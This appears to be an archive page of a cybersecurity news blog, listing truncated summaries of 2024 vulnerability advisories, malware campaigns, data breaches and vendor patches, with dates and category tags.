A critical vulnerability in TeamViewer’s Windows Remote client, CVE-2024-7479 and CVE-2024-7481, allows attackers to elevate privileges on affected systems across various versions. TeamViewer Vulnerability Flaw The vulnerability in TeamViewer arises [...]

Google Warns of North Korean IT Workers Infiltrating U.S. Workforce

Recently, Google alerted organizations about North Korean IT workers acting on behalf of hackers. Organizations today face rising cybersecurity threats that can cause major financial and reputational harm. Cybersecurity entails [...]

By | September 26th, 2024|google, Internet Security, Security Advisory, Security Update, Tips|0 Comments

0-day flaws in Automated Tank Gauge systems threaten critical infrastructure.

Researchers at BitSight TRACE found multiple 0-day vulnerabilities in ATG systems used to manage fuel storage tanks, posing risks to public safety and economic stability. These flaws could lead to [...]

Cisco Smart Licensing Vulnerability Allows Attackers to Control Devices

Cisco revealed a critical vulnerability, CVE-2024-20439, in its Smart Licensing Utility, allowing unauthorized access due to a hardcoded static password found by an independent researcher. CVE-2024-20439 This vulnerability mainly affects [...]

macOS Sequoia update disrupts multiple security tools

Apple’s macOS 15 Sequoia update has broken several key security tools, sparking user frustration across social media and Mac developer forums. macOS Sequoia Update The release of macOS Sequoia has [...]

By | September 24th, 2024|Internet Security, MacOS, Security Advisory, Security Update|0 Comments

Fake CAPTCHA sites install Lumma Stealer malware

A new malware campaign is gaining traction online, using fake CAPTCHA sites to trick users into installing Lumma Stealer (also known as Lumma C2). Users are asked to press specific [...]

Disney to End Use of Slack After Hack Exposes Company Data

The Walt Disney Company will stop using Slack for internal communication following a hack that leaked over a terabyte of company data. In a memo to employees, Disney CFO Hugh [...]

By | September 23rd, 2024|Compromised, Exploitation, Security Advisory, Security Update|0 Comments

MediaTek Wi-Fi Zero-Click RCE Vulnerability

A critical 0-click RCE vulnerability (CVE-2024-20017) in MediaTek Wi-Fi 6 chipsets, used by devices like Ubiquiti, Xiaomi, and Netgear, allows remote attacks without user interaction. CVE-2024-20017 The vulnerability is located [...]

By | September 23rd, 2024|RCE Flaw, Security Advisory, Security Update, vulnerability, Zero Day Attack|0 Comments

Hacker stole data from Federal Bank customers

A threat actor has allegedly claimed a breach of Federal Bank, exposing sensitive data of hundreds of thousands of customers. ThreatMon first reported the breach on X, quickly drawing attention [...]

New macOS malware allows attackers to control devices remotely

HZ RAT, a remote access trojan (RAT) that has targeted Windows devices since 2020, has recently been upgraded to also attack Mac users. A RAT allows attackers to gain remote [...]

Threat actors claim to have compromised Dell’s employee database

A hacking group has claimed responsibility for breaching the Dell employee database, asserting access to sensitive information of around 10,800 employees and partners on a prominent hacking forum. The breach [...]

By | September 20th, 2024|BOTNET, Compromised, Exploitation, Security Advisory, Security Update, Tips|0 Comments

CISA Issues Six Advisories for Industrial Control Systems

CISA has issued six advisories highlighting vulnerabilities in various industrial control systems. The advisories cover: Rockwell Automation’s RSLogix 5 and RSLogix 500 software, which are widely used for programming and [...]

By | September 20th, 2024|Internet Security, Security Advisory, Security Update, Tips, vulnerability|0 Comments

Researchers Uncover Raptor Train Botnet with 60,000+ Devices

Researchers discovered a large Chinese state-sponsored IoT botnet, "Raptor Train," which compromised over 200,000 SOHO and IoT devices. Operated by Flax Typhoon, the botnet uses a sophisticated control system called [...]

Threat Actor Claims to Be Selling Bharat Petroleum Database

A threat actor is reportedly selling a database from Bharat Petroleum Corporation Limited (BPCL). DarkWebInformer first reported this on X, raising serious cybersecurity concerns for the corporation and its stakeholders. [...]

By | September 18th, 2024|BOTNET, Compromised, Exploitation, Security Advisory, Security Update|0 Comments

Scams and Fake Websites during Amazon Prime Day

Amazon Prime Day scams refer to fraudulent schemes that exploit the retailer's sell-off day. While the event is a big opportunity for retailers, scammers also use it to target unsuspecting [...]

Apple releases iOS 18, fixing 32 security vulnerabilities

Apple has released iOS 18, fixing 32 security vulnerabilities. The update is available for iPhone XS and later, along with iPad Pro (13-inch, 12.9-inch 3rd gen and newer), iPad Pro [...]

By | September 18th, 2024|Apple, Security Advisory, Security Update|0 Comments

North Korean hackers spread RustDoor Malware on LinkedIn

North Korean hackers are targeting LinkedIn users with advanced malware called RustDoor. This highlights the growing use of social engineering by state-sponsored groups, particularly from North Korea, on professional networking [...]

By | September 17th, 2024|malicious cyber actors, Malware, Security Advisory, Security Update|0 Comments

Hackers leverage Selenium Grid for malicious activity

Threat actors are exploiting Selenium Grid's default lack of authentication in two active campaigns, deploying exploit kits, cryptominers, and proxyjackers. All about Selenium Grid Tool Selenium Grid's widespread adoption among [...]

Critical Vulnerabilities Impact Millions of D-Link Routers — Patch Now!

Millions of D-Link routers are vulnerable to critical security flaws. Urgent firmware updates have been released, and users are advised to patch their devices immediately to prevent exploitation. CVE-2024-45694-Stack-based Buffer [...]

Windows MSHTML zero-day actively exploited

Adobe's September 2024 updates fixed 28 vulnerabilities, including a critical ColdFusion flaw (CVSS 9.8). Other affected products include Photoshop, Illustrator, Premiere Pro, After Effects, Audition, and Media Encoder. These updates [...]

Apache Patches Critical OFBiz RCE Vulnerability

Hackers are exploiting a critical Apache OFBiz vulnerability (CVE-2024-45195) that allows unauthenticated remote code execution, threatening organizations using OFBiz. Apache OFBiz Flaw- CVE-2024-45195 The CVE-2024-45195 vulnerability results from missing view [...]

Kali Linux 2024.3 Launches with New Hacking Tools

Kali Linux 2024.3, the latest version of Offensive Security's Debian-based distribution for ethical hacking, has been released. This update introduces 11 new tools and includes key behind-the-scenes improvements. The Kali [...]

By | September 13th, 2024|Security Advisory, Security Update, Tips|0 Comments

New Loki Backdoor Targets macOS Systems

Cody Thomas created Apfell in 2018, an open-source macOS post-exploitation framework that later evolved into Mythic, a cross-platform framework addressing the limits of existing tools. Loki Backdoor Mythic offers a [...]

By | September 12th, 2024|Backdoor, Internet Security, MacOS, Malware, Security Advisory, Security Update|0 Comments

New Android Spyware Posing as TV Streaming App Steals Data

Recent research has uncovered new Android Spyware targeting mnemonic keys, vital for cryptocurrency wallet recovery. Disguised as legitimate apps, the malware scans devices for images containing mnemonic phrases and steals [...]

By | September 12th, 2024|Android malware, Malware, Security Advisory, Security Update, spyware|0 Comments

CosmicBeetle Targets SMBs Worldwide Using Old Vulnerabilities

Hackers target SMBs because they often have weaker security and lack cybersecurity awareness. Without regular security audits or incident response plans, SMBs become easy targets for attackers exploiting vulnerabilities. CosmicBeetle [...]

Zyxel NAS Devices Prone to Command Injection Attacks

Zyxel released critical hotfixes to fix a command injection vulnerability in two of its NAS products, NAS326 and NAS542. Although these devices are no longer supported for vulnerabilities, they remain [...]

By | September 10th, 2024|BOTNET, Internet Security, Security Advisory, Security Update, vulnerability|0 Comments

Hackers Exploit GeoServer RCE to Deploy Malware

Cybersecurity researchers at Fortinet recently discovered that hackers have been exploiting GeoServer RCE vulnerability to deploy malware, and the vulnerability is tracked as “CVE-2024-36401.” GeoServer RCE Vulnerability GeoServer is an [...]

Vulnerabilities in IBM WebSphere Integration Server could let attackers execute commands.

Critical vulnerabilities have been found that could let attackers execute commands on systems. These issues, listed in the Common Vulnerabilities and Exposures (CVE) system, pose serious risks and need urgent [...]

By | September 9th, 2024|Tips, vulnerability|0 Comments

Akira Ransomware Targets SonicWall Firewall RCE Flaw

SonicWall revealed a critical RCE vulnerability (CVE-2024-40766) in SonicOS on August 22, 2024. Initially, no exploitation was reported, but by September 6, active attacks were detected. This flaw allows attackers [...]

By | September 9th, 2024|Ransomware, RCE Flaw, Security Advisory, Security Update, vulnerability|0 Comments

Predator Spyware leverages “one-click” and “zero-click” exploits

Recent research shows Predator spyware has resurfaced with improved evasion techniques, despite US sanctions. It's still active in countries like the DRC and Angola, targeting high-profile individuals with harder-to-track infrastructure, [...]

By | September 6th, 2024|Exploitation, Malware, Security Advisory, Security Update, spyware, vulnerability|0 Comments

Lazarus Hackers Targeting Job Seekers with JavaScript Malware

Lazarus Group, a notorious North Korean-linked hacker group active since 2010, has intensified its attacks in 2024. Group-IB researchers found Lazarus abusing Contagious Interview campaigns using BeaverTail malware and the [...]

ToddyCat APT Exploits SMB and IKEEXT RCE to Deploy ICMP Backdoor

ToddyCat is an APT group active since December 2020, targeting government and military entities in Europe and Asia. Known for sophisticated cyber-espionage, Kaspersky Lab found ToddyCat exploiting SMB, IKEEXT, and [...]

New Emansrepo Malware Targets Windows via HTML Files

Emansrepo, a Python infostealer, is spread through phishing emails with fake purchase orders. The attack has evolved, now involving multiple stages. Stolen data is zipped and sent to the attacker, [...]

RCE Vulnerability in D-Link WAP Allows Remote Access by Attackers

The D-Link DAP-2310 Wireless Access Point is vulnerable to remote code execution, allowing attackers to gain unauthorized remote access. Discovered by Dark Wolf Solutions, this guide covers the details of [...]

By | September 3rd, 2024|BOTNET, Exploitation, Security Advisory, Security Update, Tips, vulnerability|0 Comments

New ManticoraLoader Malware Targets Citrix Users for Data Theft

DeadXInject, the group behind AresLoader and AiDLocker ransomware, is now offering ManticoraLoader, a new Malware-as-a-Service (MaaS) targeting Windows systems. Available on underground forums and Telegram since August 8th, 2024, this [...]

Snake Keylogger Targets Windows via Malicious Excel Files

Researchers have identified a sophisticated phishing campaign using a .NET-based Snake Keylogger variant. This attack uses weaponized Excel files to compromise Windows systems, posing serious risks to data security. Snake [...]

Voldemort Hackers Exploit Google Sheets to Target Windows Users

Proofpoint researchers have uncovered a cyberattack campaign, "Voldemort," using Google Sheets as a C2 platform. Targeting Windows users, the campaign employs a unique attack chain with both common and rare [...]

Watch Out for Fake Palo Alto Tool Spreading Advanced Malware

A sophisticated malware is threatening organizations in the Middle East by disguising itself as the legitimate Palo Alto GlobalProtect tool. It uses a two-stage infection process and advanced command-and-control (C&C) [...]

Critical Vulnerability in Perl Installer Enables Traffic Interception

A critical vulnerability in App::cpanminus (cpanm), a popular tool for installing Perl modules, has been identified. Known as CVE-2024-45321, it allows attackers to intercept and manipulate traffic during module installation, [...]

Research Uncovers Eight Android and iOS Apps Leaking Users’ Sensitive Data

The eight Android and iOS apps fail to protect user data by transmitting sensitive information, such as device details, geolocation, and credentials, over HTTP instead of HTTPS. This exposes data [...]

EDR Killer Malware Disables Security Tools on Windows Machines

Attackers can exploit Windows drivers to bypass security by exploiting vulnerabilities or using stolen signatures to load malicious drivers into the kernel, disabling protections. While Microsoft enforces driver signature rules, [...]

Apache Vulnerability Exposed Unix Systems to Data Theft

A recently disclosed vulnerability in the Apache Portable Runtime (APR) library, identified as CVE-2023-49582, could expose sensitive application data on Unix platforms. Apache Vulnerability The flaw results from insufficient permissions [...]

Microsoft 365 Flags Image Emails as Malware

Microsoft 365 users report emails with images being wrongly flagged as malware and quarantined, identified as Issue ID: EX873252. This issue has raised significant concerns among businesses and individual users [...]

By | August 27th, 2024|Internet Security, Malware, Microsoft, Security Advisory, Security Update|0 Comments

Ransomware Hits Patelco Credit Union, Steals Customer and Employee Data

Patelco Credit Union revealed a ransomware attack compromising member and employee data, raising concerns about security and privacy. All about the Ransomware Patelco Credit Union detected a ransomware attack on [...]

BeaverTail Malware Hits Windows Users via Games

Researchers discovered a new malware campaign called BeaverTail, targeting job seekers in a North Korean cyber espionage operation. BeaverTail Malware Initially identified as a JavaScript-based info stealer, BeaverTail has evolved [...]

Active Exploitation of Chrome Zero-Day Vulnerability

Google has released Chrome 128 (128.0.6613.84 for Linux and 128.0.6613.84/.85 for Windows and Mac) to address a critical zero-day vulnerability actively exploited in the wild. The update includes 38 security [...]

Caution: Malicious Slack Ads Deliver Harmful Payloads

Cybercriminals are using Google search ads to distribute malware disguised as legitimate ads for Slack. This advanced tactic shows how threat actors are getting better at avoiding security measures and [...]

Ngate malware steals card funds on Android devices

ESET researchers recently identified new Android malware called “Ngate” that allows hackers to withdraw money from victims’ payment cards. Ngate malware NGate Android malware, identified in November 2023, represents a [...]

Log4j Vulnerability Exploited Again to Deploy Crypto-Mining Malware

Recent Log4j attacks use obfuscated LDAP requests to execute malicious scripts, establish persistence, and exfiltrate data. Multiple backdoors and encrypted channels maintain control, emphasizing the ongoing threat of the Log4j [...]

Backdoor in MIFARE Smart Cards Reveals User-Defined Keys

Researchers uncover new attack vectors in MIFARE Classic cards by analyzing the CRYPTO-1 algorithm and vulnerabilities, demonstrating how to extract data, clone cards, and compromise both new and old card [...]

New UULoader Malware Spreads Gh0st RAT and Mimikatz

UULoader malware delivers payloads like Gh0st RAT and Mimikatz, targeting Korean and Chinese speakers through malicious installers. UULoader Malware Discovered by the Cyberint Research Team, the malware includes Chinese strings [...]

Dell SupportAssist Vulnerability Enables Privilege Escalation on PCs

A critical security vulnerability affects Dell SupportAssist for Home PCs, specifically in installer version 4.0.3. Dell SupportAssist Vulnerability CVE-2024-38305 lets local low-privileged attackers escalate their privileges and run arbitrary code [...]

Unauthenticated RCE in WordPress Plugin Exposes 100K Sites

A critical vulnerability (CVE-2024-5932) in the GiveWP plugin exposes over 100,000 WordPress sites to remote code execution (RCE) attacks, as disclosed by researcher villu164 through the Wordfence Bug Bounty Program. [...]

MegaMedusa: A Powerful Web DDoS Tool Used by Hackers

RipperSec, a pro-Palestinian Malaysian hacktivist group that started on Telegram in June 2023, has quickly grown to over 2,000 members. They carry out cyberattacks like data breaches, defacements, and DDoS [...]

Urgent: Windows TCP/IP Vulnerability Discovered, Update Now

A critical vulnerability in the Windows TCP/IP stack enables unauthenticated remote code execution (RCE) through specially crafted IPv6 packets. This flaw affects all supported versions of Windows and Windows Server, [...]

Vulnerability in Microsoft Apps Let Hackers Spy on Mac Users

A critical vulnerability in Microsoft apps for macOS allowed hackers to surreptitiously spy on Mac users' activities. Security researchers from Cisco Talos revealed how attackers could exploit this flaw to [...]

By | August 20th, 2024|MacOS, Malware, Microsoft, Security Advisory, Security Update, vulnerability|0 Comments

New Styx Stealer Targets Users to Steal Login Passwords

A new threat called Styx Stealer has emerged, targeting users by stealing sensitive data like saved passwords, cookies, and autofill details from popular web browsers. Styx Stealer This malware targets [...]

Google Pixel Devices Shipped with Flawed App

Recent research revealed a vulnerability in the Android package of many Google Pixel smartphones. Devices shipped globally since September 2017 could be at risk of malware due to a pre-installed [...]

Lazarus Group Exploited Windows Zero-day

The notorious Lazarus hacker group exploited a zero-day vulnerability in Microsoft Windows, targeting the Ancillary Function Driver for WinSock (AFD.sys), identified as CVE-2024-38193. Discovered by researchers Luigino Camastra and Milanek [...]

New Exploit BYOVDLL Bypasses LSASS Protection

In July 2022, Microsoft patched a PPL bypass flaw, but a new exploit called "BYOVDLL" has been discovered, allowing attackers to bypass LSASS protection. All about BYOVDLL In October 2022, [...]

Malspam Targets AnyDesk and Microsoft Teams

Cybersecurity researchers have uncovered a sophisticated malspam campaign targeting users via email and phone. Attackers are exploiting AnyDesk and Microsoft Teams to gain unauthorized access to victims' computers, highlighting evolving [...]

By | August 16th, 2024|malicious cyber actors, Malware, Security Advisory, Security Update, Spam|0 Comments

Ransomware Group Introduces New EDR Killer Tool

A ransomware group, RansomHub, has introduced EDRKillShifter, a tool designed to disable EDR systems. This advancement highlights the group's evolving tactics to bypass security measures and execute attacks. Although a [...]

By | August 16th, 2024|BOTNET, Compromised, Exploitation, malicious cyber actors, Malware, Ransomware|0 Comments

Critical IBM QRadar Flaws Enable Remote Arbitrary Code Execution

IBM recently revealed critical vulnerabilities in QRadar Suite Software and IBM Cloud Pak for Security. Exploitation of these flaws could let attackers execute arbitrary code remotely, posing serious security risks. [...]

0.0.0.0 Day – 18-Year-Old Flaw Bypasses Browser Security

Threat actors frequently exploit browser flaws to gain unauthorized access and conduct various illicit activities. Recently, Oligo Security discovered a critical 18-year-old vulnerability, dubbed "0.0.0.0 day," which bypasses all browser [...]

Update Now: Critical SAP Auth Bypass and SSRF Vulnerabilities Fixed

SAP has issued a major security update addressing critical authentication bypass and server-side request forgery vulnerabilities, with CVSS scores of 9.8 and 9.1. The company advises all users to install [...]

1Password macOS Vulnerability Leads to Credentials Leak

A critical vulnerability in 1Password for macOS allows attackers to bypass security measures and access vault items. This issue affects every version of the macOS app. A patch is now [...]

Apache OFBiz RCE Vulnerability Found, Patch Immediately

A vulnerability, CVE-2024-38856, has been found in Apache OFBiz, allowing unauthenticated remote code execution. A patch is available, and developers strongly recommend installing it immediately due to the high risk [...]

By | August 6th, 2024|Security Advisory, Security Update, Tips, vulnerability|0 Comments

New Spyware Targeting Android Users

Cybersecurity experts have uncovered sophisticated Android spyware, LianSpy, targeting users to steal sensitive data. It uses advanced evasion techniques, posing a significant threat to Android users globally. All about LianSpy [...]

Russia-linked APT used a car ad to phish diplomats with Headlace malware.

A Russia-linked threat actor used a car ad to phish diplomats and deliver the HeadLace backdoor, likely starting in March 2024, according to Palo Alto Networks Unit 42. They attribute [...]

Critical Flaw in Voice Over Wi-Fi Allows Eavesdropping

Voice Over Wi-Fi (VoWiFi) is commonly used for making voice calls over Wi-Fi, improving call quality and reliability. Recently, cybersecurity researchers discovered a vulnerability in VoWiFi that allows attackers to [...]

Ubiquiti G4 Vulnerability Discovered, Enabling DDoS Attacks

Researchers found a flaw in Ubiquiti G4 Wi-Fi cameras that exposes critical data. They believe a similar vulnerability was used in 2019 for DoS attacks on many cameras. Despite Ubiquiti's [...]

Hackers Exploit WordPress Plugin File Upload Flaw

Hackers are exploiting a critical vulnerability (CVE-2024-6220) in the WordPress plugin 简数采集器 (Keydatas) that allows unauthenticated users to upload arbitrary files, risking remote code execution and full site takeover. On [...]

Microsoft Patches Critical Edge Flaw Enabling Code Execution

Microsoft has patched critical vulnerabilities in Edge. Users should update to the latest version to ensure security. Asec Ahnlab identified these flaws in Edge versions 127.0.6533.88 and 127.0.6533.89. All about [...]

Hackers Exploiting GeoServer RCE Flaw, 6,635 Servers at Risk

A critical flaw in GeoServer, an open-source Java software, exposes thousands of servers to risk. The vulnerability, CVE-2024-36401, allows unauthenticated remote code execution, threatening global geospatial data infrastructures. A recent [...]

Phishing Campaign Exploited Proofpoint for Email Spoofing

Guardio Labs recently identified "EchoSpoofing," a critical vulnerability in Proofpoint's email protection service used by 87% of Fortune 100 companies. This flaw allows hackers to exploit phishing emails, tricking recipients [...]

New Specula Tool Turns Outlook into a C2 Server via Registry Exploit

Cybersecurity firm TrustedSec has introduced a new tool named Specula, which leverages a longstanding vulnerability in Microsoft Outlook to turn it into a Command and Control (C2) server. This discovery [...]

Microsoft 365 and Azure Outage Disrupts Multiple Services

Microsoft is investigating a global outage affecting access to some Microsoft 365 and Azure services. Microsoft 365 and Azure Outage Currently, the incident affects users worldwide and only a subset [...]

By | July 31st, 2024|Internet Security, Security Advisory, Security Update, Tips|0 Comments

Chinese Users Targeted by Gh0st RAT Malware Through Fake Chrome Page

Attackers are using Gh0stGambit to spread Gh0st RAT malware to Chinese users via a fake Google Chrome download page, mimicking the legitimate site. GH0ST RAT Trojan Targets Chinese Windows Users [...]

Progress Patches New Privilege Escalation Flaw in MOVEit File Transfer

Progress, the company behind MOVEit Transfer, has issued a critical security alert for a newly discovered vulnerability in its product. The flaw, CVE-2024-6576, is classified as high-severity with a CVSS [...]

Malicious Python Package Targets macOS Developers for Google Cloud Login Theft

Hackers exploit malicious Python packages to attack developer environments, inject harmful code, and steal sensitive information or install malware. This method leverages popular repositories for broad impact with minimal effort. [...]

RaspAP Vulnerability Allows Hackers to Gain Privileges on Raspberry Pi Devices

A critical local privilege escalation vulnerability (CVE-2024-41637) was found in RaspAP, an open-source project for turning Raspberry Pi devices into wireless access points or routers. Rated 9.9 (Critical) on the [...]

Phishing Attack Hits Indian Mobile Users via India Post Scams

Indian iPhone users are inundated with SMS phishing scams posing as India Post delivery notifications, aimed at stealing credentials for future scams. Fraudsters Pose as India Post in SMS Phishing [...]

Threat Actors Claim Leak of 250M IOC Data; CrowdStrike Responds

The hacktivist group USDoD claims to have leaked CrowdStrike's "entire threat actor list" and an "entire IOC list" with over 250 million data points. Details of the Alleged Leak: On [...]

By | July 26th, 2024|BOTNET, Compromised, Exploitation, Security Advisory, Security Update|0 Comments

Google Chrome Issues Warnings for Malicious Downloads

Google Chrome now has a new download system with alerts for potentially harmful files, enhancing user security. Last year, Google Chrome introduced a revamped downloads interface on desktops, making it [...]

Jellyfish Loader Malware Discovered, Poses Threat to 2024 Olympics

A new threat, Jellyfish Loader, has been identified as a .NET-based shellcode downloader disguised as a Windows shortcut. Despite its unusual features suggesting it may still be in development, it [...]

Alert: Krampus Loader Gaining Popularity on the Dark Web

"Krampus," a new malware loader, is gaining popularity on the dark web, according to MonThreat on X (formerly Twitter). What is Krampus Loader Krampus Loader is a type of malware [...]

Watch Out for Malicious Python Packages That Steal Sensitive Data

Malicious Python packages uploaded by "dsfsdfds" to PyPI stole sensitive data from user systems and sent it to a Telegram bot likely associated with Iraqi cybercriminals. Active since 2022, the [...]

By | July 24th, 2024|BOTNET, Compromised, Exploitation, Security Advisory, Security Update|0 Comments

Attackers Exploit Swap File to Steal Credit Card Information

Researchers at Sucuri recently discovered that website swap files can be exploited to install a persistent credit card skimmer on Magento e-commerce platforms. Swap files, which store overflow data from [...]

Flaw in Cisco VPN routers enables remote code execution by attackers

Cisco disclosed a significant flaw in the upload module of RV340 and RV345 VPN routers, allowing remote, authenticated attackers to run arbitrary code. Tracked as CVE-2024-20416 with a CVSS score [...]

Watch out for fake browser updates installing malicious BOINC software.

Since July 4, 2024, SocGholish (FakeUpdates) has shown new behavior. The infection chain starts with a compromised website prompting a fake browser update. Downloading the update triggers malicious code that [...]

SonicOS IPSec VPN Vulnerability Allows Attackers to Cause DoS Condition

SonicWall has disclosed a critical heap-based buffer overflow vulnerability in SonicOS IPSec VPN, identified as CVE-2024-40764, which can allow remote attackers to cause a DoS condition. The vulnerability has a [...]

BadPack Malware for Android Infects APK Installers

New research reveals a novel approach to hiding malware in APK installers. Adversaries manipulate the file header to circumvent protection and make analysis much more difficult. The peak usage of [...]

By | July 21st, 2024|Android malware, BOTNET, Compromised, Malware, Tips|0 Comments

Hackers Claim Dettol Data Breach Affects 453,646 Users

Threat actor ‘Hana’ claims to have breached Dettol India, affecting 453,646 users, according to a FalconFeedsio post on X. Dettol Data Breach The post reveals that the breach exposed user [...]

CrowdStrike Update Leads to Widespread Windows BSOD Crashes

A recent CrowdStrike update has caused widespread Blue Screen of Death (BSOD) errors on Windows machines. The issue affects multiple versions of the company’s sensor software, prompting an urgent investigation [...]

By | July 19th, 2024|Internet Security, Security Advisory, Security Update, windows|0 Comments